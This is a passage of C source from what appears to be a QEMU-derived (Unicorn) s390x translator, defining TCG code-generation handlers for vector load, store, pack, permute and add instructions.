gen_gvec128_3_i64(TCGContext *tcg_ctx, gen_gvec128_3_i64_fn fn, uint8_t d, uint8_t a, uint8_t b) { TCGv_i64 dh = tcg_temp_new_i64(tcg_ctx); TCGv_i64 dl = tcg_temp_new_i64(tcg_ctx); TCGv_i64 ah = tcg_temp_new_i64(tcg_ctx); TCGv_i64 al = tcg_temp_new_i64(tcg_ctx); TCGv_i64 bh = tcg_temp_new_i64(tcg_ctx); TCGv_i64 bl = tcg_temp_new_i64(tcg_ctx); read_vec_element_i64(tcg_ctx, ah, a, 0, ES_64); read_vec_element_i64(tcg_ctx, al, a, 1, ES_64); read_vec_element_i64(tcg_ctx, bh, b, 0, ES_64); read_vec_element_i64(tcg_ctx, bl, b, 1, ES_64); fn(tcg_ctx, dl, dh, al, ah, bl, bh); write_vec_element_i64(tcg_ctx, dh, d, 0, ES_64); write_vec_element_i64(tcg_ctx, dl, d, 1, ES_64); tcg_temp_free_i64(tcg_ctx, dh); tcg_temp_free_i64(tcg_ctx, dl); tcg_temp_free_i64(tcg_ctx, ah); tcg_temp_free_i64(tcg_ctx, al); tcg_temp_free_i64(tcg_ctx, bh); tcg_temp_free_i64(tcg_ctx, bl); } typedef void (*gen_gvec128_4_i64_fn)(TCGContext *tcg_ctx, TCGv_i64 dl, TCGv_i64 dh, TCGv_i64 al, TCGv_i64 ah, TCGv_i64 bl, TCGv_i64 bh, TCGv_i64 cl, TCGv_i64 ch); static void gen_gvec128_4_i64(TCGContext *tcg_ctx, gen_gvec128_4_i64_fn fn, uint8_t d, uint8_t a, uint8_t b, uint8_t c) { TCGv_i64 dh = tcg_temp_new_i64(tcg_ctx); TCGv_i64 dl = tcg_temp_new_i64(tcg_ctx); TCGv_i64 ah = tcg_temp_new_i64(tcg_ctx); TCGv_i64 al = tcg_temp_new_i64(tcg_ctx); TCGv_i64 bh = tcg_temp_new_i64(tcg_ctx); TCGv_i64 bl = tcg_temp_new_i64(tcg_ctx); TCGv_i64 ch = tcg_temp_new_i64(tcg_ctx); TCGv_i64 cl = tcg_temp_new_i64(tcg_ctx); read_vec_element_i64(tcg_ctx, ah, a, 0, ES_64); read_vec_element_i64(tcg_ctx, al, a, 1, ES_64); read_vec_element_i64(tcg_ctx, bh, b, 0, ES_64); read_vec_element_i64(tcg_ctx, bl, b, 1, ES_64); read_vec_element_i64(tcg_ctx, ch, c, 0, ES_64); read_vec_element_i64(tcg_ctx, cl, c, 1, ES_64); fn(tcg_ctx, dl, dh, al, ah, bl, bh, cl, ch); write_vec_element_i64(tcg_ctx, dh, d, 0, ES_64); write_vec_element_i64(tcg_ctx, dl, d, 1, ES_64); tcg_temp_free_i64(tcg_ctx, dh); tcg_temp_free_i64(tcg_ctx, dl); tcg_temp_free_i64(tcg_ctx, ah); tcg_temp_free_i64(tcg_ctx, al); tcg_temp_free_i64(tcg_ctx, bh); tcg_temp_free_i64(tcg_ctx, bl); tcg_temp_free_i64(tcg_ctx, ch); tcg_temp_free_i64(tcg_ctx, cl); } static void gen_gvec_dupi(TCGContext *tcg_ctx, uint8_t es, uint8_t reg, uint64_t c) { switch (es) { case ES_8: tcg_gen_gvec_dup8i(tcg_ctx, vec_full_reg_offset(reg), 16, 16, c); break; case ES_16: tcg_gen_gvec_dup16i(tcg_ctx, vec_full_reg_offset(reg), 16, 16, c); break; case ES_32: tcg_gen_gvec_dup32i(tcg_ctx, vec_full_reg_offset(reg), 16, 16, c); break; case ES_64: gen_gvec_dup64i(tcg_ctx, reg, c); break; default: g_assert_not_reached(); } } static void zero_vec(TCGContext *tcg_ctx, uint8_t reg) { tcg_gen_gvec_dup8i(tcg_ctx, vec_full_reg_offset(reg), 16, 16, 0); } static void gen_addi2_i64(TCGContext *tcg_ctx, TCGv_i64 dl, TCGv_i64 dh, TCGv_i64 al, TCGv_i64 ah, uint64_t b) { TCGv_i64 bl = tcg_const_i64(tcg_ctx, b); TCGv_i64 bh = tcg_const_i64(tcg_ctx, 0); tcg_gen_add2_i64(tcg_ctx, dl, dh, al, ah, bl, bh); tcg_temp_free_i64(tcg_ctx, bl); tcg_temp_free_i64(tcg_ctx, bh); } static DisasJumpType op_vge(DisasContext *s, DisasOps *o) { TCGContext *tcg_ctx = s->uc->tcg_ctx; const uint8_t es = s->insn->data; const uint8_t enr = get_field(s, m3); TCGv_i64 tmp; if (!valid_vec_element(enr, es)) { gen_program_exception(s, PGM_SPECIFICATION); return DISAS_NORETURN; } tmp = tcg_temp_new_i64(tcg_ctx); read_vec_element_i64(tcg_ctx, tmp, get_field(s, v2), enr, es); tcg_gen_add_i64(tcg_ctx, o->addr1, o->addr1, tmp); gen_addi_and_wrap_i64(s, o->addr1, o->addr1, 0); tcg_gen_qemu_ld_i64(tcg_ctx, tmp, o->addr1, get_mem_index(s), MO_TE | es); write_vec_element_i64(tcg_ctx, tmp, get_field(s, v1), enr, es); tcg_temp_free_i64(tcg_ctx, tmp); return DISAS_NEXT; } static uint64_t generate_byte_mask(uint8_t mask) { uint64_t r = 0; int i; for (i = 0; i < 8; i++) { if ((mask >> i) & 1) { r |= 0xffull << (i * 8); } } return r; } static DisasJumpType op_vgbm(DisasContext *s, DisasOps *o) { TCGContext *tcg_ctx = s->uc->tcg_ctx; const uint16_t i2 = get_field(s, i2); if (i2 == (i2 & 0xff) * 0x0101) { /* * Masks for both 64 bit elements of the vector are the same. * Trust tcg to produce a good constant loading. */ gen_gvec_dup64i(tcg_ctx, get_field(s, v1), generate_byte_mask(i2 & 0xff)); } else { TCGv_i64 t = tcg_temp_new_i64(tcg_ctx); tcg_gen_movi_i64(tcg_ctx, t, generate_byte_mask(i2 >> 8)); write_vec_element_i64(tcg_ctx, t, get_field(s, v1), 0, ES_64); tcg_gen_movi_i64(tcg_ctx, t, generate_byte_mask(i2)); write_vec_element_i64(tcg_ctx, t, get_field(s, v1), 1, ES_64); tcg_temp_free_i64(tcg_ctx, t); } return DISAS_NEXT; } static DisasJumpType op_vgm(DisasContext *s, DisasOps *o) { TCGContext *tcg_ctx = s->uc->tcg_ctx; const uint8_t es = get_field(s, m4); const uint8_t bits = NUM_VEC_ELEMENT_BITS(es); const uint8_t i2 = get_field(s, i2) & (bits - 1); const uint8_t i3 = get_field(s, i3) & (bits - 1); uint64_t mask = 0; int i; if (es > ES_64) { gen_program_exception(s, PGM_SPECIFICATION); return DISAS_NORETURN; } /* generate the mask - take care of wrapping */ for (i = i2; ; i = (i + 1) % bits) { mask |= 1ull << (bits - i - 1); if (i == i3) { break; } } gen_gvec_dupi(tcg_ctx, es, get_field(s, v1), mask); return DISAS_NEXT; } static DisasJumpType op_vl(DisasContext *s, DisasOps *o) { TCGContext *tcg_ctx = s->uc->tcg_ctx; TCGv_i64 t0 = tcg_temp_new_i64(tcg_ctx); TCGv_i64 t1 = tcg_temp_new_i64(tcg_ctx); tcg_gen_qemu_ld_i64(tcg_ctx, t0, o->addr1, get_mem_index(s), MO_TEQ); gen_addi_and_wrap_i64(s, o->addr1, o->addr1, 8); tcg_gen_qemu_ld_i64(tcg_ctx, t1, o->addr1, get_mem_index(s), MO_TEQ); write_vec_element_i64(tcg_ctx, t0, get_field(s, v1), 0, ES_64); write_vec_element_i64(tcg_ctx, t1, get_field(s, v1), 1, ES_64); tcg_temp_free(tcg_ctx, t0); tcg_temp_free(tcg_ctx, t1); return DISAS_NEXT; } static DisasJumpType op_vlr(DisasContext *s, DisasOps *o) { TCGContext *tcg_ctx = s->uc->tcg_ctx; gen_gvec_mov(tcg_ctx, get_field(s, v1), get_field(s, v2)); return DISAS_NEXT; } static DisasJumpType op_vlrep(DisasContext *s, DisasOps *o) { TCGContext *tcg_ctx = s->uc->tcg_ctx; const uint8_t es = get_field(s, m3); TCGv_i64 tmp; if (es > ES_64) { gen_program_exception(s, PGM_SPECIFICATION); return DISAS_NORETURN; } tmp = tcg_temp_new_i64(tcg_ctx); tcg_gen_qemu_ld_i64(tcg_ctx, tmp, o->addr1, get_mem_index(s), MO_TE | es); gen_gvec_dup_i64(tcg_ctx, es, get_field(s, v1), tmp); tcg_temp_free_i64(tcg_ctx, tmp); return DISAS_NEXT; } static DisasJumpType op_vle(DisasContext *s, DisasOps *o) { TCGContext *tcg_ctx = s->uc->tcg_ctx; const uint8_t es = s->insn->data; const uint8_t enr = get_field(s, m3); TCGv_i64 tmp; if (!valid_vec_element(enr, es)) { gen_program_exception(s, PGM_SPECIFICATION); return DISAS_NORETURN; } tmp = tcg_temp_new_i64(tcg_ctx); tcg_gen_qemu_ld_i64(tcg_ctx, tmp, o->addr1, get_mem_index(s), MO_TE | es); write_vec_element_i64(tcg_ctx, tmp, get_field(s, v1), enr, es); tcg_temp_free_i64(tcg_ctx, tmp); return DISAS_NEXT; } static DisasJumpType op_vlei(DisasContext *s, DisasOps *o) { TCGContext *tcg_ctx = s->uc->tcg_ctx; const uint8_t es = s->insn->data; const uint8_t enr = get_field(s, m3); TCGv_i64 tmp; if (!valid_vec_element(enr, es)) { gen_program_exception(s, PGM_SPECIFICATION); return DISAS_NORETURN; } tmp = tcg_const_i64(tcg_ctx, (int16_t)get_field(s, i2)); write_vec_element_i64(tcg_ctx, tmp, get_field(s, v1), enr, es); tcg_temp_free_i64(tcg_ctx, tmp); return DISAS_NEXT; } static DisasJumpType op_vlgv(DisasContext *s, DisasOps *o) { TCGContext *tcg_ctx = s->uc->tcg_ctx; const uint8_t es = get_field(s, m4); TCGv_ptr ptr; if (es > ES_64) { gen_program_exception(s, PGM_SPECIFICATION); return DISAS_NORETURN; } /* fast path if we don't need the register content */ if (!get_field(s, b2)) { uint8_t enr = get_field(s, d2) & (NUM_VEC_ELEMENTS(es) - 1); read_vec_element_i64(tcg_ctx, o->out, get_field(s, v3), enr, es); return DISAS_NEXT; } ptr = tcg_temp_new_ptr(tcg_ctx); get_vec_element_ptr_i64(tcg_ctx, ptr, get_field(s, v3), o->addr1, es); switch (es) { case ES_8: tcg_gen_ld8u_i64(tcg_ctx, o->out, ptr, 0); break; case ES_16: tcg_gen_ld16u_i64(tcg_ctx, o->out, ptr, 0); break; case ES_32: tcg_gen_ld32u_i64(tcg_ctx, o->out, ptr, 0); break; case ES_64: tcg_gen_ld_i64(tcg_ctx, o->out, ptr, 0); break; default: // g_assert_not_reached(); break; } tcg_temp_free_ptr(tcg_ctx, ptr); return DISAS_NEXT; } static DisasJumpType op_vllez(DisasContext *s, DisasOps *o) { TCGContext *tcg_ctx = s->uc->tcg_ctx; uint8_t es = get_field(s, m3); uint8_t enr; TCGv_i64 t; switch (es) { /* rightmost sub-element of leftmost doubleword */ case ES_8: enr = 7; break; case ES_16: enr = 3; break; case ES_32: enr = 1; break; case ES_64: enr = 0; break; /* leftmost sub-element of leftmost doubleword */ case 6: if (s390_has_feat(s->uc, S390_FEAT_VECTOR_ENH)) { es = ES_32; enr = 0; break; } /* fallthrough */ default: gen_program_exception(s, PGM_SPECIFICATION); return DISAS_NORETURN; } t = tcg_temp_new_i64(tcg_ctx); tcg_gen_qemu_ld_i64(tcg_ctx, t, o->addr1, get_mem_index(s), MO_TE | es); zero_vec(tcg_ctx, get_field(s, v1)); write_vec_element_i64(tcg_ctx, t, get_field(s, v1), enr, es); tcg_temp_free_i64(tcg_ctx, t); return DISAS_NEXT; } static DisasJumpType op_vlm(DisasContext *s, DisasOps *o) { TCGContext *tcg_ctx = s->uc->tcg_ctx; const uint8_t v3 = get_field(s, v3); uint8_t v1 = get_field(s, v1); TCGv_i64 t0, t1; if (v3 < v1 || (v3 - v1 + 1) > 16) { gen_program_exception(s, PGM_SPECIFICATION); return DISAS_NORETURN; } /* * Check for possible access exceptions by trying to load the last * element. The first element will be checked first next. */ t0 = tcg_temp_new_i64(tcg_ctx); t1 = tcg_temp_new_i64(tcg_ctx); gen_addi_and_wrap_i64(s, t0, o->addr1, (v3 - v1) * 16 + 8); tcg_gen_qemu_ld_i64(tcg_ctx, t0, t0, get_mem_index(s), MO_TEQ); for (;; v1++) { tcg_gen_qemu_ld_i64(tcg_ctx, t1, o->addr1, get_mem_index(s), MO_TEQ); write_vec_element_i64(tcg_ctx, t1, v1, 0, ES_64); if (v1 == v3) { break; } gen_addi_and_wrap_i64(s, o->addr1, o->addr1, 8); tcg_gen_qemu_ld_i64(tcg_ctx, t1, o->addr1, get_mem_index(s), MO_TEQ); write_vec_element_i64(tcg_ctx, t1, v1, 1, ES_64); gen_addi_and_wrap_i64(s, o->addr1, o->addr1, 8); } /* Store the last element, loaded first */ write_vec_element_i64(tcg_ctx, t0, v1, 1, ES_64); tcg_temp_free_i64(tcg_ctx, t0); tcg_temp_free_i64(tcg_ctx, t1); return DISAS_NEXT; } static DisasJumpType op_vlbb(DisasContext *s, DisasOps *o) { TCGContext *tcg_ctx = s->uc->tcg_ctx; const int64_t block_size = (1ull << (get_field(s, m3) + 6)); const int v1_offs = vec_full_reg_offset(get_field(s, v1)); TCGv_ptr a0; TCGv_i64 bytes; if (get_field(s, m3) > 6) { gen_program_exception(s, PGM_SPECIFICATION); return DISAS_NORETURN; } bytes = tcg_temp_new_i64(tcg_ctx); a0 = tcg_temp_new_ptr(tcg_ctx); /* calculate the number of bytes until the next block boundary */ tcg_gen_ori_i64(tcg_ctx, bytes, o->addr1, -block_size); tcg_gen_neg_i64(tcg_ctx, bytes, bytes); tcg_gen_addi_ptr(tcg_ctx, a0, tcg_ctx->cpu_env, v1_offs); gen_helper_vll(tcg_ctx, tcg_ctx->cpu_env, a0, o->addr1, bytes); tcg_temp_free_i64(tcg_ctx, bytes); tcg_temp_free_ptr(tcg_ctx, a0); return DISAS_NEXT; } static DisasJumpType op_vlvg(DisasContext *s, DisasOps *o) { TCGContext *tcg_ctx = s->uc->tcg_ctx; const uint8_t es = get_field(s, m4); TCGv_ptr ptr; if (es > ES_64) { gen_program_exception(s, PGM_SPECIFICATION); return DISAS_NORETURN; } /* fast path if we don't need the register content */ if (!get_field(s, b2)) { uint8_t enr = get_field(s, d2) & (NUM_VEC_ELEMENTS(es) - 1); write_vec_element_i64(tcg_ctx, o->in2, get_field(s, v1), enr, es); return DISAS_NEXT; } ptr = tcg_temp_new_ptr(tcg_ctx); get_vec_element_ptr_i64(tcg_ctx, ptr, get_field(s, v1), o->addr1, es); switch (es) { case ES_8: tcg_gen_st8_i64(tcg_ctx, o->in2, ptr, 0); break; case ES_16: tcg_gen_st16_i64(tcg_ctx, o->in2, ptr, 0); break; case ES_32: tcg_gen_st32_i64(tcg_ctx, o->in2, ptr, 0); break; case ES_64: tcg_gen_st_i64(tcg_ctx, o->in2, ptr, 0); break; default: // g_assert_not_reached(); break; } tcg_temp_free_ptr(tcg_ctx, ptr); return DISAS_NEXT; } static DisasJumpType op_vlvgp(DisasContext *s, DisasOps *o) { TCGContext *tcg_ctx = s->uc->tcg_ctx; write_vec_element_i64(tcg_ctx, o->in1, get_field(s, v1), 0, ES_64); write_vec_element_i64(tcg_ctx, o->in2, get_field(s, v1), 1, ES_64); return DISAS_NEXT; } static DisasJumpType op_vll(DisasContext *s, DisasOps *o) { TCGContext *tcg_ctx = s->uc->tcg_ctx; const int v1_offs = vec_full_reg_offset(get_field(s, v1)); TCGv_ptr a0 = tcg_temp_new_ptr(tcg_ctx); /* convert highest index into an actual length */ tcg_gen_addi_i64(tcg_ctx, o->in2, o->in2, 1); tcg_gen_addi_ptr(tcg_ctx, a0, tcg_ctx->cpu_env, v1_offs); gen_helper_vll(tcg_ctx, tcg_ctx->cpu_env, a0, o->addr1, o->in2); tcg_temp_free_ptr(tcg_ctx, a0); return DISAS_NEXT; } static DisasJumpType op_vmr(DisasContext *s, DisasOps *o) { TCGContext *tcg_ctx = s->uc->tcg_ctx; const uint8_t v1 = get_field(s, v1); const uint8_t v2 = get_field(s, v2); const uint8_t v3 = get_field(s, v3); const uint8_t es = get_field(s, m4); int dst_idx, src_idx; TCGv_i64 tmp; if (es > ES_64) { gen_program_exception(s, PGM_SPECIFICATION); return DISAS_NORETURN; } tmp = tcg_temp_new_i64(tcg_ctx); if (s->fields.op2 == 0x61) { /* iterate backwards to avoid overwriting data we might need later */ for (dst_idx = NUM_VEC_ELEMENTS(es) - 1; dst_idx >= 0; dst_idx--) { src_idx = dst_idx / 2; if (dst_idx % 2 == 0) { read_vec_element_i64(tcg_ctx, tmp, v2, src_idx, es); } else { read_vec_element_i64(tcg_ctx, tmp, v3, src_idx, es); } write_vec_element_i64(tcg_ctx, tmp, v1, dst_idx, es); } } else { /* iterate forward to avoid overwriting data we might need later */ for (dst_idx = 0; dst_idx < NUM_VEC_ELEMENTS(es); dst_idx++) { src_idx = (dst_idx + NUM_VEC_ELEMENTS(es)) / 2; if (dst_idx % 2 == 0) { read_vec_element_i64(tcg_ctx, tmp, v2, src_idx, es); } else { read_vec_element_i64(tcg_ctx, tmp, v3, src_idx, es); } write_vec_element_i64(tcg_ctx, tmp, v1, dst_idx, es); } } tcg_temp_free_i64(tcg_ctx, tmp); return DISAS_NEXT; } static DisasJumpType op_vpk(DisasContext *s, DisasOps *o) { TCGContext *tcg_ctx = s->uc->tcg_ctx; const uint8_t v1 = get_field(s, v1); const uint8_t v2 = get_field(s, v2); const uint8_t v3 = get_field(s, v3); const uint8_t es = get_field(s, m4); static gen_helper_gvec_3 * const vpk[3] = { gen_helper_gvec_vpk16, gen_helper_gvec_vpk32, gen_helper_gvec_vpk64, }; static gen_helper_gvec_3 * const vpks[3] = { gen_helper_gvec_vpks16, gen_helper_gvec_vpks32, gen_helper_gvec_vpks64, }; static gen_helper_gvec_3_ptr * const vpks_cc[3] = { gen_helper_gvec_vpks_cc16, gen_helper_gvec_vpks_cc32, gen_helper_gvec_vpks_cc64, }; static gen_helper_gvec_3 * const vpkls[3] = { gen_helper_gvec_vpkls16, gen_helper_gvec_vpkls32, gen_helper_gvec_vpkls64, }; static gen_helper_gvec_3_ptr * const vpkls_cc[3] = { gen_helper_gvec_vpkls_cc16, gen_helper_gvec_vpkls_cc32, gen_helper_gvec_vpkls_cc64, }; if (es == ES_8 || es > ES_64) { gen_program_exception(s, PGM_SPECIFICATION); return DISAS_NORETURN; } switch (s->fields.op2) { case 0x97: if (get_field(s, m5) & 0x1) { gen_gvec_3_ptr(tcg_ctx, v1, v2, v3, tcg_ctx->cpu_env, 0, vpks_cc[es - 1]); set_cc_static(s); } else { gen_gvec_3_ool(tcg_ctx, v1, v2, v3, 0, vpks[es - 1]); } break; case 0x95: if (get_field(s, m5) & 0x1) { gen_gvec_3_ptr(tcg_ctx, v1, v2, v3, tcg_ctx->cpu_env, 0, vpkls_cc[es - 1]); set_cc_static(s); } else { gen_gvec_3_ool(tcg_ctx, v1, v2, v3, 0, vpkls[es - 1]); } break; case 0x94: /* If sources and destination dont't overlap -> fast path */ if (v1 != v2 && v1 != v3) { const uint8_t src_es = get_field(s, m4); const uint8_t dst_es = src_es - 1; TCGv_i64 tmp = tcg_temp_new_i64(tcg_ctx); int dst_idx, src_idx; for (dst_idx = 0; dst_idx < NUM_VEC_ELEMENTS(dst_es); dst_idx++) { src_idx = dst_idx; if (src_idx < NUM_VEC_ELEMENTS(src_es)) { read_vec_element_i64(tcg_ctx, tmp, v2, src_idx, src_es); } else { src_idx -= NUM_VEC_ELEMENTS(src_es); read_vec_element_i64(tcg_ctx, tmp, v3, src_idx, src_es); } write_vec_element_i64(tcg_ctx, tmp, v1, dst_idx, dst_es); } tcg_temp_free_i64(tcg_ctx, tmp); } else { gen_gvec_3_ool(tcg_ctx, v1, v2, v3, 0, vpk[es - 1]); } break; default: g_assert_not_reached(); } return DISAS_NEXT; } static DisasJumpType op_vperm(DisasContext *s, DisasOps *o) { TCGContext *tcg_ctx = s->uc->tcg_ctx; gen_gvec_4_ool(tcg_ctx, get_field(s, v1), get_field(s, v2), get_field(s, v3), get_field(s, v4), 0, gen_helper_gvec_vperm); return DISAS_NEXT; } static DisasJumpType op_vpdi(DisasContext *s, DisasOps *o) { TCGContext *tcg_ctx = s->uc->tcg_ctx; const uint8_t i2 = extract32(get_field(s, m4), 2, 1); const uint8_t i3 = extract32(get_field(s, m4), 0, 1); TCGv_i64 t0 = tcg_temp_new_i64(tcg_ctx); TCGv_i64 t1 = tcg_temp_new_i64(tcg_ctx); read_vec_element_i64(tcg_ctx, t0, get_field(s, v2), i2, ES_64); read_vec_element_i64(tcg_ctx, t1, get_field(s, v3), i3, ES_64); write_vec_element_i64(tcg_ctx, t0, get_field(s, v1), 0, ES_64); write_vec_element_i64(tcg_ctx, t1, get_field(s, v1), 1, ES_64); tcg_temp_free_i64(tcg_ctx, t0); tcg_temp_free_i64(tcg_ctx, t1); return DISAS_NEXT; } static DisasJumpType op_vrep(DisasContext *s, DisasOps *o) { TCGContext *tcg_ctx = s->uc->tcg_ctx; const uint8_t enr = get_field(s, i2); const uint8_t es = get_field(s, m4); if (es > ES_64 || !valid_vec_element(enr, es)) { gen_program_exception(s, PGM_SPECIFICATION); return DISAS_NORETURN; } tcg_gen_gvec_dup_mem(tcg_ctx, es, vec_full_reg_offset(get_field(s, v1)), vec_reg_offset(get_field(s, v3), enr, es), 16, 16); return DISAS_NEXT; } static DisasJumpType op_vrepi(DisasContext *s, DisasOps *o) { TCGContext *tcg_ctx = s->uc->tcg_ctx; const int64_t data = (int16_t)get_field(s, i2); const uint8_t es = get_field(s, m3); if (es > ES_64) { gen_program_exception(s, PGM_SPECIFICATION); return DISAS_NORETURN; } gen_gvec_dupi(tcg_ctx, es, get_field(s, v1), data); return DISAS_NEXT; } static DisasJumpType op_vsce(DisasContext *s, DisasOps *o) { TCGContext *tcg_ctx = s->uc->tcg_ctx; const uint8_t es = s->insn->data; const uint8_t enr = get_field(s, m3); TCGv_i64 tmp; if (!valid_vec_element(enr, es)) { gen_program_exception(s, PGM_SPECIFICATION); return DISAS_NORETURN; } tmp = tcg_temp_new_i64(tcg_ctx); read_vec_element_i64(tcg_ctx, tmp, get_field(s, v2), enr, es); tcg_gen_add_i64(tcg_ctx, o->addr1, o->addr1, tmp); gen_addi_and_wrap_i64(s, o->addr1, o->addr1, 0); read_vec_element_i64(tcg_ctx, tmp, get_field(s, v1), enr, es); tcg_gen_qemu_st_i64(tcg_ctx, tmp, o->addr1, get_mem_index(s), MO_TE | es); tcg_temp_free_i64(tcg_ctx, tmp); return DISAS_NEXT; } static DisasJumpType op_vsel(DisasContext *s, DisasOps *o) { TCGContext *tcg_ctx = s->uc->tcg_ctx; gen_gvec_fn_4(tcg_ctx, bitsel, ES_8, get_field(s, v1), get_field(s, v4), get_field(s, v2), get_field(s, v3)); return DISAS_NEXT; } static DisasJumpType op_vseg(DisasContext *s, DisasOps *o) { TCGContext *tcg_ctx = s->uc->tcg_ctx; const uint8_t es = get_field(s, m3); int idx1, idx2; TCGv_i64 tmp; switch (es) { case ES_8: idx1 = 7; idx2 = 15; break; case ES_16: idx1 = 3; idx2 = 7; break; case ES_32: idx1 = 1; idx2 = 3; break; default: gen_program_exception(s, PGM_SPECIFICATION); return DISAS_NORETURN; } tmp = tcg_temp_new_i64(tcg_ctx); read_vec_element_i64(tcg_ctx, tmp, get_field(s, v2), idx1, es | MO_SIGN); write_vec_element_i64(tcg_ctx, tmp, get_field(s, v1), 0, ES_64); read_vec_element_i64(tcg_ctx, tmp, get_field(s, v2), idx2, es | MO_SIGN); write_vec_element_i64(tcg_ctx, tmp, get_field(s, v1), 1, ES_64); tcg_temp_free_i64(tcg_ctx, tmp); return DISAS_NEXT; } static DisasJumpType op_vst(DisasContext *s, DisasOps *o) { TCGContext *tcg_ctx = s->uc->tcg_ctx; TCGv_i64 tmp = tcg_const_i64(tcg_ctx, 16); /* Probe write access before actually modifying memory */ gen_helper_probe_write_access(tcg_ctx, tcg_ctx->cpu_env, o->addr1, tmp); read_vec_element_i64(tcg_ctx, tmp, get_field(s, v1), 0, ES_64); tcg_gen_qemu_st_i64(tcg_ctx, tmp, o->addr1, get_mem_index(s), MO_TEQ); gen_addi_and_wrap_i64(s, o->addr1, o->addr1, 8); read_vec_element_i64(tcg_ctx, tmp, get_field(s, v1), 1, ES_64); tcg_gen_qemu_st_i64(tcg_ctx, tmp, o->addr1, get_mem_index(s), MO_TEQ); tcg_temp_free_i64(tcg_ctx, tmp); return DISAS_NEXT; } static DisasJumpType op_vste(DisasContext *s, DisasOps *o) { TCGContext *tcg_ctx = s->uc->tcg_ctx; const uint8_t es = s->insn->data; const uint8_t enr = get_field(s, m3); TCGv_i64 tmp; if (!valid_vec_element(enr, es)) { gen_program_exception(s, PGM_SPECIFICATION); return DISAS_NORETURN; } tmp = tcg_temp_new_i64(tcg_ctx); read_vec_element_i64(tcg_ctx, tmp, get_field(s, v1), enr, es); tcg_gen_qemu_st_i64(tcg_ctx, tmp, o->addr1, get_mem_index(s), MO_TE | es); tcg_temp_free_i64(tcg_ctx, tmp); return DISAS_NEXT; } static DisasJumpType op_vstm(DisasContext *s, DisasOps *o) { TCGContext *tcg_ctx = s->uc->tcg_ctx; const uint8_t v3 = get_field(s, v3); uint8_t v1 = get_field(s, v1); TCGv_i64 tmp; while (v3 < v1 || (v3 - v1 + 1) > 16) { gen_program_exception(s, PGM_SPECIFICATION); return DISAS_NORETURN; } /* Probe write access before actually modifying memory */ tmp = tcg_const_i64(tcg_ctx, (v3 - v1 + 1) * 16); gen_helper_probe_write_access(tcg_ctx, tcg_ctx->cpu_env, o->addr1, tmp); for (;; v1++) { read_vec_element_i64(tcg_ctx, tmp, v1, 0, ES_64); tcg_gen_qemu_st_i64(tcg_ctx, tmp, o->addr1, get_mem_index(s), MO_TEQ); gen_addi_and_wrap_i64(s, o->addr1, o->addr1, 8); read_vec_element_i64(tcg_ctx, tmp, v1, 1, ES_64); tcg_gen_qemu_st_i64(tcg_ctx, tmp, o->addr1, get_mem_index(s), MO_TEQ); if (v1 == v3) { break; } gen_addi_and_wrap_i64(s, o->addr1, o->addr1, 8); } tcg_temp_free_i64(tcg_ctx, tmp); return DISAS_NEXT; } static DisasJumpType op_vstl(DisasContext *s, DisasOps *o) { TCGContext *tcg_ctx = s->uc->tcg_ctx; const int v1_offs = vec_full_reg_offset(get_field(s, v1)); TCGv_ptr a0 = tcg_temp_new_ptr(tcg_ctx); /* convert highest index into an actual length */ tcg_gen_addi_i64(tcg_ctx, o->in2, o->in2, 1); tcg_gen_addi_ptr(tcg_ctx, a0, tcg_ctx->cpu_env, v1_offs); gen_helper_vstl(tcg_ctx, tcg_ctx->cpu_env, a0, o->addr1, o->in2); tcg_temp_free_ptr(tcg_ctx, a0); return DISAS_NEXT; } static DisasJumpType op_vup(DisasContext *s, DisasOps *o) { TCGContext *tcg_ctx = s->uc->tcg_ctx; const bool logical = s->fields.op2 == 0xd4 || s->fields.op2 == 0xd5; const uint8_t v1 = get_field(s, v1); const uint8_t v2 = get_field(s, v2); const uint8_t src_es = get_field(s, m3); const uint8_t dst_es = src_es + 1; int dst_idx, src_idx; TCGv_i64 tmp; if (src_es > ES_32) { gen_program_exception(s, PGM_SPECIFICATION); return DISAS_NORETURN; } tmp = tcg_temp_new_i64(tcg_ctx); if (s->fields.op2 == 0xd7 || s->fields.op2 == 0xd5) { /* iterate backwards to avoid overwriting data we might need later */ for (dst_idx = NUM_VEC_ELEMENTS(dst_es) - 1; dst_idx >= 0; dst_idx--) { src_idx = dst_idx; read_vec_element_i64(tcg_ctx, tmp, v2, src_idx, src_es | (logical ? 0 : MO_SIGN)); write_vec_element_i64(tcg_ctx, tmp, v1, dst_idx, dst_es); } } else { /* iterate forward to avoid overwriting data we might need later */ for (dst_idx = 0; dst_idx < NUM_VEC_ELEMENTS(dst_es); dst_idx++) { src_idx = dst_idx + NUM_VEC_ELEMENTS(src_es) / 2; read_vec_element_i64(tcg_ctx, tmp, v2, src_idx, src_es | (logical ? 0 : MO_SIGN)); write_vec_element_i64(tcg_ctx, tmp, v1, dst_idx, dst_es); } } tcg_temp_free_i64(tcg_ctx, tmp); return DISAS_NEXT; } static DisasJumpType op_va(DisasContext *s, DisasOps *o) { TCGContext *tcg_ctx = s->uc->tcg_ctx; const uint8_t es = get_field(s, m4); if (es > ES_128) { gen_program_exception(s, PGM_SPECIFICATION); return DISAS_NORETURN; } else if (es == ES_128) { gen_gvec128_3_i64(tcg_ctx, tcg_gen_add2_i64, get_field(s, v1), get_field(s, v2), get_field(s, v3)); return DISAS_NEXT; } gen_gvec_fn_3(tcg_ctx, add, es, get_field(s, v1), get_field(s, v2), get_field(s, v3)); return DISAS_NEXT; } static void gen_acc(TCGContext *tcg_ctx, TCGv_i64 d, TCGv_i64 a, TCGv_i64 b, uint8_t es) { const uint8_t msb_bit_nr = NUM_VEC_ELEMENT_BITS(es) - 1; TCGv_i64 msb_mask = tcg_const_i64(tcg_ctx, dup_const(es, 1ull << msb_bit_nr)); TCGv_i64 t1 = tcg_temp_new_i64(tcg_ctx); TCGv_i64 t2 = tcg_temp_new_i64(tcg_ctx); TCGv_i64 t3 = tcg_temp_new_i64(tcg_ctx); /* Calculate the carry into the MSB, ignoring the old MSBs */ tcg_gen_andc_i64(tcg_ctx, t1, a, msb_mask); tcg_gen_andc_i64(tcg_ctx, t2, b, msb_mask); tcg_gen_add_i64(tcg_ctx, t1, t1, t2); /* Calculate the MSB without any carry into it */ tcg_gen_xor_i64(tcg_ctx, t3, a, b); /* Calculate the carry out of the MSB in the MSB bit position */ tcg_gen_and_i64(tcg_ctx, d, a, b); tcg_gen_and_i64(tcg_ctx, t1, t1, t3); tcg_gen_or_i64(tcg_ctx, d, d, t1); /* Isolate and shift the carry into position */ tcg_gen_and_i64(tcg_ctx, d, d, msb_mask); tcg_gen_shri_i64(tcg_ctx, d, d, msb_bit_nr); tcg_temp_free_i64(tcg_ctx, t1); tcg_temp_free_i64(tcg_ctx, t2); 